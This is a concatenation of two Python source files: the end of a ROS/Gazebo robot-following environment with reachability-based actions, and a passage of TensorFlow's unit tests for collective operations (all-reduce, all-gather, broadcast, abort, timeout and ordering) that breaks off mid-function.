v_idx = get_idx(velocity_norm * (self.reachabilit_value.shape[2]-1))
rospy.loginfo("x: {} y: {} theta {}".format(x_idx, y_idx, orientation_idx))
v_idx = max(min(v_idx, self.reachabilit_value.shape[2]-2), 0)
orientation_idx = max(min(orientation_idx, self.reachabilit_value.shape[3]-2), 0)
x_idx = max(min(x_idx, self.reachabilit_value.shape[0]-1), 0)
y_idx = max(min(y_idx, self.reachabilit_value.shape[1]-1), 0)
derivative_v = (self.reachabilit_value[x_idx, y_idx, v_idx+1, orientation_idx] -\
self.reachabilit_value[x_idx, y_idx, v_idx, orientation_idx])/2
derivative_theta = (self.reachabilit_value[x_idx, y_idx, v_idx, orientation_idx+1] -\
self.reachabilit_value[x_idx, y_idx, v_idx, orientation_idx])/2
rospy.loginfo("x: {} y: {} theta {}".format(x_idx, y_idx, orientation_idx))
return derivative_v, derivative_theta, self.reachabilit_value[x_idx, y_idx, v_idx, orientation_idx]
def reachability_action(self):
relative = GazeborosEnv.get_relative_position(self.robot.get_pos(), self.person)
orientation = GazeborosEnv.wrap_pi_to_pi(self.robot.get_orientation() - self.person.get_orientation())
print (np.rad2deg(orientation), np.rad2deg(self.person.get_orientation()), np.rad2deg(self.robot.get_orientation()) )
velocity = self.robot.get_velocity()[0]
derivative_v, derivative_theta, v = self.calculate_rechability_derivite(relative[0], relative[1], velocity, orientation)
rospy.loginfo("d_v: {:0.5f} W: {:0.5f} v {:0.1f}".format(derivative_v, derivative_theta, v))
action = [0,0]
if v<1:
if derivative_v > 0:
action[0] = 1
else:
action[0] = -1
if derivative_theta > 0:
action[1] = 1
else:
action[1] = -1
return action
#def read_bag():
# gazeboros_n = GazeborosEnv()
# gazeboros_n.set_agent(0)
#
# while gazeboros_n.robot.prev_call_gazeboros_ is None or rospy.Time.now().to_sec() - gazeboros_n.robot.prev_call_gazeboros_ < 5:
# rospy.sleep(0.1)
# gazeboros_n.save_log()
# print("done")
#read_bag()
def test():
gazeboros_env = GazeborosEnv()
gazeboros_env.set_agent(0)
step = 0
while (True):
step +=1
#action = gazeboros_env.get_supervised_action()
#action = gazeboros_env.reachability_action()
#gazeboros_env.step(action)
rel_person = GazeborosEnv.get_relative_heading_position(gazeboros_env.robot, gazeboros_env.person)[1]
relative_pos2 = GazeborosEnv.get_relative_position(gazeboros_env.robot.get_pos(), gazeboros_env.robot.relative)
orientation1 = np.rad2deg(np.arctan2(rel_person[1], rel_person[0]))
distance = math.hypot(relative_pos2[0], relative_pos2[1])
heading_robot = gazeboros_env.robot.state_["orientation"]
heading_person = gazeboros_env.person.state_["orientation"]
heading_relative = GazeborosEnv.wrap_pi_to_pi(heading_robot-heading_person)
orientation_heading = np.rad2deg(heading_relative)
#print (f"ob: {gazeboros_env.get_observation()}")
print (f"reward: {gazeboros_env.get_reward()}")
print (f"pos: {rel_person} vs {relative_pos2}")
print (f"orientation_h: {orientation_heading} dist: {distance} orin: {orientation1}")
print (f"orientation_robo: {np.rad2deg(heading_robot)} orintation pers: {np.rad2deg(heading_person)}")
print ("\n\n")
#if step % 50==0:
# print("reseting")
# gazeboros_env.reset()
#gazeboros_env.visualize_observation()
rospy.sleep(1)
#test()
|
collective_ops_test.py | # Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for V2 Collective Operations."""
import os
import threading
import time
from absl.testing import parameterized
from tensorflow.python.compat import v2_compat
from tensorflow.python.data.experimental.ops import testing as dataset_testing
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.distribute import combinations
from tensorflow.python.distribute import test_util
from tensorflow.python.eager import cancellation
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import collective_ops as _collective_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.platform import test
class CollectiveOpsV1(object):
all_reduce = _collective_ops.all_reduce
all_gather = _collective_ops.all_gather
broadcast_send = _collective_ops.broadcast_send
broadcast_recv = _collective_ops.broadcast_recv
class CollectiveOpsV2(object):
@staticmethod
def all_reduce(t, group_size, group_key, instance_key, *args, **kwargs):
group_size = array_ops.identity(group_size)
group_key = array_ops.identity(group_key)
instance_key = array_ops.identity(instance_key)
return _collective_ops.all_reduce_v2(t, group_size, group_key, instance_key,
*args, **kwargs)
@staticmethod
def all_gather(t, group_size, group_key, instance_key, *args, **kwargs):
group_size = array_ops.identity(group_size)
group_key = array_ops.identity(group_key)
instance_key = array_ops.identity(instance_key)
return _collective_ops.all_gather_v2(t, group_size, group_key, instance_key,
*args, **kwargs)
@staticmethod
def broadcast_send(t, shape, dtype, group_size, group_key, instance_key,
*args, **kwargs):
group_size = array_ops.identity(group_size)
group_key = array_ops.identity(group_key)
instance_key = array_ops.identity(instance_key)
return _collective_ops.broadcast_send_v2(t, group_size, group_key,
instance_key, *args, **kwargs)
@staticmethod
def broadcast_recv(shape, dtype, group_size, group_key, instance_key, *args,
**kwargs):
group_size = array_ops.identity(group_size)
group_key = array_ops.identity(group_key)
instance_key = array_ops.identity(instance_key)
shape = array_ops.identity(shape)
return _collective_ops.broadcast_recv_v2(
shape, dtype, group_size, group_key, instance_key, *args, **kwargs)
device_combination = (
combinations.combine(device='CPU', communication='RING', required_gpus=0) +
combinations.combine(
device='GPU', communication=['RING', 'NCCL'], required_gpus=2))
collective_op_combinations = combinations.combine(collective_op=[
combinations.NamedObject('all_reduce', CollectiveOpsV1.all_reduce),
combinations.NamedObject('all_reduce_v2', CollectiveOpsV2.all_reduce),
combinations.NamedObject('all_gather', CollectiveOpsV1.all_gather),
combinations.NamedObject('all_gather_v2', CollectiveOpsV2.all_gather)
])
@combinations.generate(
combinations.times(
combinations.combine(
collective_ops=[
combinations.NamedObject('v1', CollectiveOpsV1),
combinations.NamedObject('v2', CollectiveOpsV2)
],
mode='eager'), device_combination))
class CollectiveOpsTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testReduce(self, collective_ops, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
@def_function.function
def run_all_reduce_1device():
with ops.device(dev0):
in_value = constant_op.constant([1.])
group_size = 1
group_key = 1
instance_key = 1
return collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication)
@def_function.function
def run_all_reduce_2devices():
in_value = constant_op.constant([1.])
group_size = 2
group_key = 2
instance_key = 2
collectives = []
with ops.device(dev0):
collectives.append(
collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
with ops.device(dev1):
collectives.append(
collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
return collectives
self.assertAllClose(run_all_reduce_1device(), [1.], rtol=1e-5, atol=1e-5)
for result in run_all_reduce_2devices():
self.assertAllClose(result, [2.], rtol=1e-5, atol=1e-5)
def testGather(self, collective_ops, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
@def_function.function
def run_all_gather_1device():
with ops.device(dev0):
in_value = constant_op.constant([1.])
group_size = 1
group_key = 1
instance_key = 1
return collective_ops.all_gather(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication)
@def_function.function
def run_all_gather_2devices():
in_value = constant_op.constant([1.])
group_size = 2
group_key = 2
instance_key = 2
collectives = []
with ops.device(dev0):
collectives.append(
collective_ops.all_gather(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
with ops.device(dev1):
collectives.append(
collective_ops.all_gather(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
return collectives
self.assertAllClose(run_all_gather_1device(), [1.], rtol=1e-5, atol=1e-5)
for result in run_all_gather_2devices():
self.assertAllClose(result, [1., 1.], rtol=1e-5, atol=1e-5)
def testBroadcast(self, collective_ops, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
@def_function.function
def run_broadcast_2devices():
shape = [3]
in_value = constant_op.constant([1., 2., 3.], shape=shape)
group_size = 2
group_key = 2
instance_key = 2
collectives = []
with ops.device(dev0):
collectives.append(
collective_ops.broadcast_send(
in_value,
shape,
in_value.dtype,
group_size,
group_key,
instance_key,
communication_hint=communication))
with ops.device(dev1):
collectives.append(
collective_ops.broadcast_recv(
shape,
in_value.dtype,
group_size,
group_key,
instance_key,
communication_hint=communication))
return collectives
for result in run_broadcast_2devices():
self.assertAllClose(result, [1., 2., 3.], rtol=1e-5, atol=1e-5)
def testInstanceKeyScopedUnderGroupKey(self, collective_ops, device,
communication):
if device == 'GPU' and context.num_gpus() < 4:
self.skipTest('not enough GPU')
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
dev2 = '/device:%s:2' % device
dev3 = '/device:%s:3' % device
@def_function.function
def run_all_reduce_4devices_same_instance_key():
# Use a common instance key for both groups.
instance_key = 0
# We will create 2 groups each with 2 devices.
group_size = 2
# Group 0 comprises dev0 and dev1.
group0_key = 0
# Group 1 comprises dev2 and dev3.
group1_key = 1
collectives = []
with ops.device(dev0):
collectives.append(
collective_ops.all_reduce(
constant_op.constant(1.), group_size, group0_key, instance_key))
with ops.device(dev1):
collectives.append(
collective_ops.all_reduce(
constant_op.constant(2.), group_size, group0_key, instance_key))
with ops.device(dev2):
collectives.append(
collective_ops.all_reduce(
constant_op.constant(3.), group_size, group1_key, instance_key))
with ops.device(dev3):
collectives.append(
collective_ops.all_reduce(
constant_op.constant(4.), group_size, group1_key, instance_key))
return collectives
results = run_all_reduce_4devices_same_instance_key()
self.assertAllClose(results[0], 3., rtol=1e-5, atol=1e-5)
self.assertAllClose(results[1], 3., rtol=1e-5, atol=1e-5)
self.assertAllClose(results[2], 7., rtol=1e-5, atol=1e-5)
self.assertAllClose(results[3], 7., rtol=1e-5, atol=1e-5)
def testCollectiveGroupSizeOne(self, collective_ops, device, communication):
dev0 = '/device:%s:0' % device
group_size = 1
group_key = 100
in_value = [1., 2., 3., 4.]
in_tensor = constant_op.constant(in_value)
with ops.device(dev0):
reduced_tensor = collective_ops.all_reduce(
in_tensor,
group_size,
group_key,
instance_key=100,
communication_hint=communication)
self.assertAllEqual(in_value, reduced_tensor.numpy())
with ops.device(dev0):
gathered_tensor = collective_ops.all_gather(
in_tensor,
group_size,
group_key,
instance_key=200,
communication_hint=communication)
self.assertAllEqual(in_value, gathered_tensor.numpy())
def testCollectiveInvalidKey(self, collective_ops, device, communication):
dev0 = '/device:%s:0' % device
group_size = 1
group_key = 100
instance_key = 100
in_value = [1., 2., 3., 4.]
in_tensor = constant_op.constant(in_value)
with ops.device(dev0):
reduced_tensor = collective_ops.all_reduce(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
self.assertAllEqual(in_value, reduced_tensor.numpy())
with self.assertRaisesRegex(
errors.InternalError, 'instance 100 expected type 0 and data_type 1 but'
' got type 2 and data_type 1'):
with ops.device(dev0):
collective_ops.all_gather(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
def testMultipleGroups(self, collective_ops, device, communication):
if device == 'GPU' and context.num_gpus() < 4:
self.skipTest('not enough GPU')
num_elements = 4
@def_function.function
def run_all_reduce(group_size, group_key):
instance_key = group_key
input_value = [float(group_key) for i in range(num_elements)]
collectives = []
for device_idx in range(group_size):
with ops.device('/{}:{}'.format(device, device_idx)):
input_tensor = constant_op.constant(input_value)
collectives.append(
collective_ops.all_reduce(
input_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication))
return collectives
def run_and_assert(group_size, group_key):
for reduced_tensor in run_all_reduce(group_size, group_key):
self.assertAllEqual(
[float(group_key) * group_size for i in range(num_elements)],
reduced_tensor.numpy())
run_and_assert(group_size=2, group_key=1)
run_and_assert(group_size=3, group_key=2)
@combinations.generate(
combinations.times(
combinations.combine(
collective_ops=[
combinations.NamedObject('v2', CollectiveOpsV2)
],
mode='eager',
max_subdivs_per_device=[-1, 0, 16]), device_combination))
class AllReduceWithSubdivisionsTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testReduce(self, collective_ops, device, communication,
max_subdivs_per_device):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
@def_function.function
def run_all_reduce_1device():
with ops.device(dev0):
in_value = constant_op.constant([1.])
group_size = 1
group_key = 1
instance_key = 1
if max_subdivs_per_device == -1:
return collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication)
else:
return collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication,
max_subdivs_per_device=max_subdivs_per_device)
@def_function.function
def run_all_reduce_2devices():
in_value = constant_op.constant([1.])
group_size = 2
group_key = 2
instance_key = 2
collectives = []
with ops.device(dev0):
collectives.append(
collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
with ops.device(dev1):
collectives.append(
collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
return collectives
self.assertAllClose(run_all_reduce_1device(), [1.], rtol=1e-5, atol=1e-5)
for result in run_all_reduce_2devices():
self.assertAllClose(result, [2.], rtol=1e-5, atol=1e-5)
@combinations.generate(
combinations.combine(required_physical_gpus=2, mode='eager'))
class XlaTest(test.TestCase, parameterized.TestCase):
def testReduce(self):
device0 = '/device:GPU:0'
device1 = '/device:GPU:1'
group_size = 2
group_key = 100
instance_key = 100
results = []
def all_reduce(device):
@def_function.function(jit_compile=True)
def f():
return _collective_ops.all_reduce_v2([1.], group_size, group_key,
instance_key)
with ops.device(device):
results.append(f())
t0 = threading.Thread(target=all_reduce, args=(device0,))
t1 = threading.Thread(target=all_reduce, args=(device1,))
t0.start()
t1.start()
t0.join()
t1.join()
self.assertAllEqual(results, [[2.], [2.]])
@combinations.generate(
combinations.times(collective_op_combinations, device_combination))
class AbortCollectiveOpsTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testAbortGroupParamsResolution(self, collective_op, device,
communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
def abort_fn():
time.sleep(2)
context.context().abort_collective_ops(errors.UNAVAILABLE, 'peer down')
t = threading.Thread(target=abort_fn)
t.start()
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
# This hangs on params resolution since we're only launching one
# collective for a group size of 2.
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# After abortion, subsequent collectives should fail immediately.
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
t.join()
# Reset the context in order to reset the collective executor.
_setup_context()
# After reset non-NCCL collectives should work.
def collective_fn():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
def_function.function(collective_fn)()
def testAbortInstanceParamsResolution(self, collective_op, device,
communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
def collective_fn():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# First perform a normal all-reduce to complete the group resolution.
def_function.function(collective_fn)()
def abort_fn():
time.sleep(2)
context.context().abort_collective_ops(errors.UNAVAILABLE, 'peer down')
t = threading.Thread(target=abort_fn)
t.start()
# Use a different instance key to trigger another instance resolution.
instance_key = 101
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
# This hangs on params resolution since we're only launching one
# collective for a group size of 2.
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# After abortion, subsequent collectives should fail immediately.
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
context._reset_context() # pylint: disable=protected-access
t.join()
# Reset the context in order to reset the collective executor.
_setup_context()
# After reset non-NCCL collectives should work.
def_function.function(collective_fn)()
def testAbortCommunication(self, collective_op, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
# First perform a normal collective to finish resolution.
def collective_fn():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
def_function.function(collective_fn)()
# Launch a collective that hangs, and abort the collective executor after
# the launch.
def abort_fn():
time.sleep(2)
context.context().abort_collective_ops(errors.UNAVAILABLE, 'peer down')
t = threading.Thread(target=abort_fn)
t.start()
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# After abortion, subsequent collectives should fail immediately.
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# Reset the context in order to reset the collective executor.
t.join()
_setup_context()
def_function.function(collective_fn)()
class OpCancellationTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
@combinations.generate(
combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce',
CollectiveOpsV1.all_reduce),
combinations.NamedObject('all_reduce_v2',
CollectiveOpsV2.all_reduce),
combinations.NamedObject('all_gather',
CollectiveOpsV1.all_gather),
combinations.NamedObject('all_gather_v2',
CollectiveOpsV2.all_gather),
],
mode='eager'), device_combination))
def testOpErrorNotAbortIfNoCollective(self, collective_op, device,
communication):
# Do not abort if there's no active collective ops. There could be
# exceptions like EOF which we expect users to catch, aborting collective
# ops on all op errors intervenes with this workflow.
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
dataset = dataset_ops.Dataset.from_tensors([1.])
@def_function.function
def collective_fn(in_tensor):
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
@def_function.function
def f():
iterator = iter(dataset)
collective_fn(next(iterator))
# This next(iterator) should raise EOF.
collective_fn(next(iterator))
with self.assertRaises(errors.OutOfRangeError):
f()
collective_fn(constant_op.constant([1.]))
@combinations.generate(
combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce',
CollectiveOpsV1.all_reduce),
combinations.NamedObject('all_gather',
CollectiveOpsV1.all_gather),
],
mode='eager'), device_combination))
def testOpErrorAbortWithCollective(self, collective_op, device,
communication):
# Abort v1 collective ops if there're active collective ops at the time of
# an op error. This is due to the inability to cancel collective ops, and op
# errors may cause running collective ops to hang.
dev0 = '/device:%s:0' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
# Make the dataset sleep a while so that the collective is being executed
# when the EOF happens.
dataset = dataset_ops.Dataset.from_tensors([1.]).apply(
dataset_testing.sleep(sleep_microseconds=200))
@def_function.function
def f():
# Launch a collective op that won't be able to finish to test abortion
# when other ops error.
with ops.device(dev0):
ret = collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
iterator = iter(dataset)
next(iterator)
# This should raise EOF.
next(iterator)
return ret
with self.assertRaises(errors.OutOfRangeError):
f()
# Now collective ops is aborted, subsequent collective ops should fail with
# the previous error.
with self.assertRaises(errors.CancelledError):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
@combinations.generate(
combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce_v2',
CollectiveOpsV2.all_reduce),
combinations.NamedObject('all_gather_v2',
CollectiveOpsV2.all_gather),
],
mode='eager'), device_combination))
def testOpErrorNotAbortWithCollective(self, collective_op, device,
communication):
# Do not abort v2 collective ops even if there're active collective ops at
# the time of an op error. We rely cancellation to terminate active
# collective ops.
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
@def_function.function
def collective_fn():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# Local params resolution cannot be cancelled yet, so we perform a normal
# collective so that the group is resolved.
collective_fn()
# Make the dataset sleep a while so that the collective is being executed
# when the EOF happens.
dataset = dataset_ops.Dataset.from_tensors([1.]).apply(
dataset_testing.sleep(sleep_microseconds=200))
@def_function.function
def f():
# Launch a collective op that won't be able to finish to test cancellation
# when other ops error.
with ops.device(dev0):
ret = collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
iterator = iter(dataset)
next(iterator)
# This should raise EOF.
next(iterator)
return ret
with self.assertRaises(errors.OutOfRangeError):
f()
# Collective ops shouldn't be aborted and new collectives should be able to
# proceed.
collective_fn()
@combinations.generate(
combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce_v2',
CollectiveOpsV2.all_reduce),
combinations.NamedObject('all_gather_v2',
CollectiveOpsV2.all_gather),
],
mode='eager'), device_combination))
def testCancelDuringParamResolution(self, collective_op, device,
communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
t1_cancellation_manager = cancellation.CancellationManager()
t2_cancellation_manager = cancellation.CancellationManager()
@def_function.function
def _collective_fn(x):
# Run an assertion to crash one of the two function executions running
# collectives. We explicitly cancel the other in response.
assert_op = check_ops.assert_equal(x, in_tensor)
with ops.control_dependencies([assert_op]):
return collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
collective_concrete = _collective_fn.get_concrete_function(in_tensor)
finish_mu = threading.Lock()
finishes = 0
def _placement_wrapper(device, x, my_cancellation, other_cancellation):
try:
with ops.device(device):
cancelable_collective = my_cancellation.get_cancelable_function(
collective_concrete)
return cancelable_collective(x)
except errors.InvalidArgumentError:
# `assert_equal` failed for this execution of the function. The other
# function would deadlock without cancellation.
other_cancellation.start_cancel()
except errors.CancelledError:
pass
nonlocal finishes
with finish_mu:
finishes += 1
t1 = threading.Thread(
target=_placement_wrapper,
args=(dev0, constant_op.constant([1.]), t1_cancellation_manager,
t2_cancellation_manager))
t2 = threading.Thread(
target=_placement_wrapper,
# Will cause the assertion to fail
args=(dev1, constant_op.constant([2.]), t2_cancellation_manager,
t1_cancellation_manager))
t1.start()
t2.start()
t1.join()
t2.join()
self.assertEqual(finishes, 2)
@combinations.generate(
combinations.times(collective_op_combinations, device_combination))
class TimeoutTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testTimeout(self, collective_op, device, communication):
timeout = 1.5
@def_function.function
def run(group_size, reported_group_size=None):
group_key = 20
instance_key = 30
tensor = [1., 2., 3., 4.]
results = []
if reported_group_size is None:
reported_group_size = group_size
for i in range(group_size):
with ops.device('/{}:{}'.format(device, i)):
input_data = constant_op.constant(tensor)
result = collective_op(
input_data,
group_size=reported_group_size,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication,
timeout=timeout)
results.append(result)
return results
run(2, 2)
start_time = time.time()
with self.assertRaisesRegex(errors.DeadlineExceededError,
'Collective has timed out during execution'):
run(1, 2)
elapsed = time.time() - start_time
self.assertAllGreaterEqual(elapsed, timeout)
def testParamResolutionAfterTimeout(self, collective_op, device,
communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
timeout = 1.5
group_key = 20
instance_key = 30
input_data = constant_op.constant([1., 2., 3., 4.])
# This timeout comes from param solution.
with self.assertRaisesRegex(
errors.DeadlineExceededError,
'Collective has timed out waiting for other workers'):
with ops.device(dev0):
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication,
timeout=timeout)
# We launch the second device after the first device times out. This is to
# simulate the situation when other workers are slow and the timeout is
# short. It should error immediately.
with self.assertRaisesRegex(
errors.DeadlineExceededError,
'Collective has timed out waiting for other workers'):
with ops.device(dev1):
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication)
def testExecutionAfterTimeout(self, collective_op, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
timeout = 1.5
group_key = 20
instance_key = 30
input_data = constant_op.constant([1., 2., 3., 4.])
@def_function.function
def run():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication,
timeout=timeout)
# Run a normal all-reduce to complete param resolution.
run()
with self.assertRaisesRegex(errors.DeadlineExceededError,
'Collective has timed out during execution'):
with ops.device(dev0):
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication,
timeout=timeout)
# We launch the second device after the first device times out. This is to
# simulate the situation when other workers are slow and the timeout is
# short. It should error immediately.
with self.assertRaisesRegex(errors.DeadlineExceededError,
'Collective has timed out during execution'):
with ops.device(dev1):
# No timeout.
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication)
class CommunicationHintTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
@combinations.generate(
combinations.times(collective_op_combinations,
combinations.combine(required_gpus=[0, 1])))
def testNCCLFallbackOnCPU(self, collective_op):
# communication_hint=NCCL should work for CPU by falling back to RING. The
# test doesn't actually require GPU, only GPU builds. We specify
# required_gpus=1 so that it's tested with GPU builds.
dev0 = '/device:CPU:0'
dev1 = '/device:CPU:1'
group_key = 20
instance_key = 30
input_data = constant_op.constant([1., 2., 3., 4.])
@def_function.function
def run():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint='NCCL')
run()
@combinations.generate(
combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce_v2',
CollectiveOpsV2.all_reduce),
combinations.NamedObject('all_gather_v2',
CollectiveOpsV2.all_gather),
],
mode='eager'), device_combination))
class OrderingTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testOrdering(self, collective_op, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
with ops.device(dev0):
token0 = resource_variable_ops.ResourceVariable(0.)
with ops.device(dev1):
token1 = resource_variable_ops.ResourceVariable(0.)
@def_function.function
def f():
# Launch the first collective with token.
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
ordering_token=token0.handle)
with ops.device(dev1):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
ordering_token=token1.handle)
# Launch the second collective without token.
with ops.device(dev0):
collective_op(in_tensor, group_size, group_key, instance_key)
with ops.device(dev1):
collective_op(in_tensor, group_size, group_key, instance_key)
# Launch the third collective with token.
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
ordering_token=token0.handle)
with ops.device(dev1):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
ordering_token=token1.handle)
graph = f.get_concrete_function().graph
for device in [dev0, dev1]:
# Try to find the third collective, which should have the first collective
# as a control input.
third = None
for op in graph.get_operations():
if (op.type.startswith('Collective') and op.device.endswith(device) and
op.control_inputs and
op.control_inputs[0].type.startswith('Collective')):
self.assertIsNone(third)
third = op
self.assertIsNotNone(third)
# Verify it's not the second collective by looking at the inputs.
self.assertTrue(any(v.dtype == dtypes.resource for v in third.inputs))
first = third.control_inputs[0]
self.assertEqual(third.device, first.device)
# Verify it's not the second collective by looking at the inputs.
self.assertTrue(any(v.dtype == dtypes.resource for v in first.inputs))
self.assertEmpty(first.control_inputs)
class InputPipelineTest(test.TestCase):
def setUp(self):
super().setUp()
_setup_context()
def testMap(self):
group_size = 2
group_key = 100
instance_key = 100
def create_dataset_and_fetch_one(t):
dataset = dataset_ops.Dataset.from_tensor_slices([t])
def reduce_fn(t):
return CollectiveOpsV2.all_reduce(
t,
group_size=group_size,
group_key=group_key,
instance_key=instance_key)
dataset = dataset.map(reduce_fn)
return next(iter(dataset))
@def_function.function
def f():
with ops.device('CPU:0'):
value0 = create_dataset_and_fetch_one([1.])
with ops.device('CPU:1'):
value1 = create_dataset_and_fetch_one([2.])
return value0, value1
self.assertAllEqual(self.evaluate(f()), [[3.], [3.]])
class CollectiveOpsV3Test(test.TestCase, parameterized.TestCase):
def setUp(self):
super().setUp()
_setup_context()
def testGroupInitialization(self):
group_size = 2
group_key = 100
@def_function.function
def f():
with ops.device('CPU:0'):
_collective_ops.initialize_communicator(
group_key=group_key, rank=0, group_size=group_size)
with ops.device('CPU:1'):
_collective_ops.initialize_communicator(
group_key=group_key, rank=1, group_size=group_size)
# TODO(b/193864859): Add validation with reduction op.
self.evaluate(f())
@combinations.generate(device_combination)
def testAllReduceV3(self, device, communication):
group_size = 2
group_key = 101
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
@def_function.function
def run_all_reduce_2devices():
collectives = []
with ops.device(dev0):
group_handle0 = _collective_ops.initialize_communicator(
group_key=group_key,
rank=0,
